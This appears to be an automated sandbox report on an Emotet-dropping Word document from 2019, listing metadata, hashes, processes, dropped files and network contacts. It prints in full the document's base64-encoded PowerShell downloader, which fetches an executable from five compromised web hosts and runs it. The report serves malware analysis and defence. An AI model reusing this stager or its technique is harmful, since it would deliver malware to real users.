File name: | FILE_XR0MIZZQPIFRMI_W.doc |
Full analysis: | https://app.any.run/tasks/eff5691f-8ed2-441b-a8c5-43734e0ad3ed |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 18:27:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Handcrafted Steel Computer, Subject: 5th generation, Author: Terry Dibbert, Comments: blue intranet, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 0891E26FB93F15A52557B4F8C1FB696D |
SHA1: | 5EEB2521293E41696071F1287B62E38373B42E1E |
SHA256: | F413E1B7C64A5C2A3CF534B1F2461C57F3F4CD409797F3B63EE5F2714F3F9C22 |
SSDEEP: | 6144:VG1qmTgpbxDj2kCUSfp40YTPLkIq7NSU4jJntATfDkBlPi7Q:VG1qmTgpbxDj2kCUSfp40Y/Xq7NSU4VV |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Handcrafted Steel Computer |
---|---|
Subject: | 5th generation |
Author: | Terry Dibbert |
Keywords: | - |
Comments: | blue intranet |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:32:00 |
ModifyDate: | 2019:09:18 14:32:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Heaney Inc |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Parker |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2776 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\FILE_XR0MIZZQPIFRMI_W.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3784 | powershell -encod JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8A05.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\FILE_XR0MIZZQPIFRMI_W.doc.LNK | lnk | |
MD5:D7262BCC101D083235CA31B9119E341F | SHA256:730EB67874FCE093948C2B415299F4CF3055CB250EAFB2CCAE27C7DCE53F5194 | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0D242A0DEFC206484428169450C9D9F7 | SHA256:A141C62F5271596F4CF644E986BD2801D93F3D036AD56E38ADD093E74151B535 | |||
2776 | WINWORD.EXE | C:\Users\admin\Downloads\~$LE_XR0MIZZQPIFRMI_W.doc | pgc | |
MD5:3A688D09AC7460C53E953D56F2D47EC7 | SHA256:396EC2A4234BCC1E1765568019126E048CECC3B0B1922F35AD1065E853777463 | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16C97518.wmf | wmf | |
MD5:88A1919A52A566ECD7EC642242223934 | SHA256:68CA5E056DC7C71AB16695D571D1525212CAA13B976BA77FC7DBD21AF20770A0 | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B4DED62.wmf | wmf | |
MD5:597872C11ED292C466AB6B41973A1DC9 | SHA256:504B99306569BEF0BAB66452F7FAA1F4C019337591DA88D20F507001DC2D8928 | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E1C19FB.wmf | wmf | |
MD5:A18664F7ECAA30815A432A8A54CD642E | SHA256:A15CC5E4E029315D316201FAF3DA847B3E3FEC3C454E2D7A3DF5737EFB56152A | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EF7103A5.wmf | wmf | |
MD5:CE7E85FB3F9A5F8D0DD3F95AD6016FB0 | SHA256:E9DA5AD29CFBFE95FAE9605C270E1F009F7DEA5DC2856F4EC8C5D843FAD3F92A | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AF242FA.wmf | wmf | |
MD5:AD736CD196000389A578EEDCA155DAE0 | SHA256:7C36C967B8A8EA18247EF24337AB88030E6DF5F149B9404D3721D2E178878EA6 | |||
2776 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:E60BBDE8905DE4B6D05AD60A8D5D8D1C | SHA256:DB1A1DCBE69F4C7FE43E54F0B9AA54910FEB62AF3C52CDEED01F8357E82F3C2F |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3784 | powershell.exe | 104.248.24.81:443 | www.supercrystal.am | — | US | unknown |
3784 | powershell.exe | 111.67.206.122:443 | pipizhanzhang.com | China Unicom Beijing Province Network | CN | unknown |
3784 | powershell.exe | 213.186.33.186:443 | hotel-bristol.lu | OVH SAS | FR | suspicious |
3784 | powershell.exe | 148.251.180.153:443 | www.patrickglobalusa.com | Hetzner Online GmbH | DE | malicious |
3784 | powershell.exe | 103.221.222.16:443 | tankhoi.vn | The Corporation for Financing & Promoting Technology | VN | unknown |
Domain | IP | Reputation |
---|---|---|
www.patrickglobalusa.com |
| malicious |
pipizhanzhang.com |
| unknown |
tankhoi.vn |
| unknown |
www.supercrystal.am |
| unknown |
hotel-bristol.lu |
| suspicious |